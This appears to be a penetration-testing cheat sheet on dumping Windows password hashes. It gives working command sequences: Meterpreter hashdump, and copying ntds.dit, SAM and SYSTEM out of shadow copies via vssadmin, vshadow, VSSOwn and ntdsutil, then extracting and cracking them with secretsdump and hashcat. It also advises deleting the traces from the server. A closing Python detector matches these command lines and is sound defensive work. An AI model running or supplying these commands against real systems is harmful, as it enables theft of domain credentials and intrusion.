Windows clients store local account hashes in the SAM database. A Windows domain controller (DC) stores the hashes of every domain account in ntds.dit.
SAM
C:\windows\repair\sam
C:\windows\System32\config\SAM
C:\windows\System32\config\RegBack\SAM
Alternatives in meterpreter:
run post/windows/gather/hashdump
run post/windows/gather/smart_hashdump
run hashdump
hashdump (load the priv extension first with: use priv)
creds_all
If hashdump doesn’t work:
- Try another meterpreter shell. E.g. the PHP meterpreter shell lacks some capabilities. Try to execute a native OS meterpreter reverse shell on the victim.
- Try to migrate to another process that runs as SYSTEM. Even as an administrator you may not be able to read the SAM file, but a meterpreter session injected into a SYSTEM process can.
Notes
- samdump2 can extract hashes out of Win 2000/XP/NT/Vista SAM files.
- If the file is not accessible, try hashdump in Meterpreter (if the command is not available, load the priv extension first with: use priv).
Format
Username : UID : LM hash : NTLM hash : : :
For hashcat, use -m 1000 (NTLM) and give it only the NTLM hash field.
Shadow Copies
A Shadow Copy is a point-in-time snapshot of a volume. With (domain) administrator rights, vshadow.exe can be used to pull sensitive files out of such a snapshot, for example ntds.dit (the Active Directory database file), which is locked on the live filesystem.
Prerequisites:
- Administrative privileges
Example to get the Active Directory database file:
- Perform a shadow copy with vshadow.exe (see p61 repo to upload):
vshadow.exe -nw -p C:
- Copy the ntds.dit file from the shadow copy to the “live” filesystem:
copy $addHereTheShadowCopyDeviceName\windows\ntds\ntds.dit C:\Temp
- Copy the System hive from the registry:
reg.exe save hklm\system C:\Temp\system_hive.bak
- Copy these two files to your own system.
- Use Impacket’s secretsdump to extract the juicy information:
impacket-secretsdump -ntds ntds.dit.bak -system system_hive.bak LOCAL
- Use and/or crack the obtained credentials.
VSSown
Use VSSOwn to create a “backup” of ntds.dit. Upload it to the victim and then:
cscript vssown.vbs /status
cscript vssown.vbs /start
cscript vssown.vbs /create /c
Then, copy ntds.dit, SAM and SYSTEM from the backup to the attacker system:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[$SomeNumberHere]\windows\ntds\ntds.dit ntdsbackup.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[$SomeNumberHere]\windows\system32\config\SYSTEM systembackup.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[$SomeNumberHere]\windows\system32\config\SAM sambackup.bak
Now, use Impacket’s secretsdump.py.
VSSAdmin
vssadmin manages shadow copies. From a Windows command prompt, list all shadow copies:
vssadmin.exe list shadows
If there is no (current) one, create a new shadow copy:
vssadmin create shadow /for=c:
Execute the list command and note the number of the shadow copy. Now, copy the interesting files:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$HERETHENUMBER\windows\ntds\ntds.dit c:\temp\ntds.dit
reg save hklm\system c:\temp\system /y
Now, copy both files to your local system. (And delete them from the server!) Extract the hashes:
secretsdump.py -ntds ntds.dit -system system -outputfile hashes.txt LOCAL
NTDSUtil
ntdsutil has an “Install From Media” (IFM) feature that creates a full backup of the domain database, including ntds.dit and the SYSTEM hive.
ntdsutil "activate instance ntds" "ifm" "create full C:\mybackup" quit quit
Then, get the files from the directory and proceed with secretsdump.py.
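From the defender's side, every technique above leaves a distinctive process command line (vssadmin/vssown/vshadow snapshot creation, a copy from a HarddiskVolumeShadowCopy device path, reg save of the SYSTEM hive, ntdsutil ifm). The following Python detector is an added example, not code from the original post; the sample events, the shadow-copy number and the paths in them are constructed, and the rule names and severity scheme are my own.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, flattened
# here to "image|command line"); the ShadowCopy number and paths are made up.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\vssadmin.exe|vssadmin create shadow /for=c:",
    r"C:\Windows\System32\cmd.exe|copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\ntds\ntds.dit c:\temp\ntds.dit",
    r"C:\Windows\System32\cmd.exe|copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\system32\config\SAM c:\temp\sam",
    r"C:\Windows\System32\reg.exe|reg save hklm\system c:\temp\system /y",
    r'C:\Windows\System32\ntdsutil.exe|ntdsutil "activate instance ntds" "ifm" "create full C:\mybackup" quit quit',
    r"C:\Windows\System32\cscript.exe|cscript vssown.vbs /create /c",
    r"C:\Windows\System32\vssadmin.exe|vssadmin list shadows",
    r"C:\Windows\System32\notepad.exe|notepad.exe readme.txt",
]

# One regex per technique named on the page, matched against the command line only.
RULES = [
    ("shadow_copy_create", re.compile(
        r"\b(vssadmin(\.exe)?\s+create\s+shadow|vssown\.vbs\s+/create|vshadow(\.exe)?\s+.*-p\b)", re.I)),
    ("ntds_from_shadow", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I)),
    ("sam_or_system_from_shadow", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\config\\(SAM|SYSTEM)\b", re.I)),
    ("system_hive_export", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
    ("ntdsutil_ifm", re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b", re.I)),
]

def classify(event):
    """Return the rule names matched by one 'image|command line' event."""
    _image, _, cmdline = event.partition("|")
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Map every matching event to its rule names; events matching nothing are dropped."""
    hits = {event: classify(event) for event in events}
    return {event: names for event, names in hits.items() if names}

def severity(hits):
    """A database/hive pulled from a snapshot, or an IFM export, is high; a lone
    snapshot creation or SYSTEM hive export is medium (both have admin uses)."""
    names = {n for rule_names in hits.values() for n in rule_names}
    if names & {"ntds_from_shadow", "sam_or_system_from_shadow", "ntdsutil_ifm"}:
        return "high"
    if names & {"shadow_copy_create", "system_hive_export"}:
        return "medium"
    return "none"
```

Run scan() over real Sysmon or 4688 command-line fields and escalate on severity(); a snapshot creation followed shortly by a copy from the snapshot device path on a domain controller is the combination worth alerting on.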